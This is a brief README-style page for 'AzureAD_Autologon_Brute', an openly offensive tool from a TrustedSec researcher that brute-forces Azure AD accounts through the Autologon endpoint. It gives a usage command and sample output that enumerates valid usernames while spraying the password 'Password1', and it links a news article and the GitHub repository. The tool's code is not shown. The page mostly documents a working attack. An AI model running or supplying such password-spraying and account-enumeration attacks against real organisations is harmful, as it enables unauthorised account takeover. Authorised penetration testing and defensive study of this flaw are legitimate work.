AzureAD_Autologon_Brute

Brute force attack tool for Azure AD Autologon

https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/

Usage:
python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1


[~/AzureAD_Autologon_Brute] # python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
Domain is  intranet.directory
Setting password as: Password1
Reading users from file: users.txt

+-----------------------------------------+
|          AzureAD AutoLogon Brute          |
|     2021.09.30 @nyxgeek - TrustedSec      |
+-----------------------------------------+

[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1

GitHub

https://github.com/nyxgeek/AzureAD_Autologon_Brute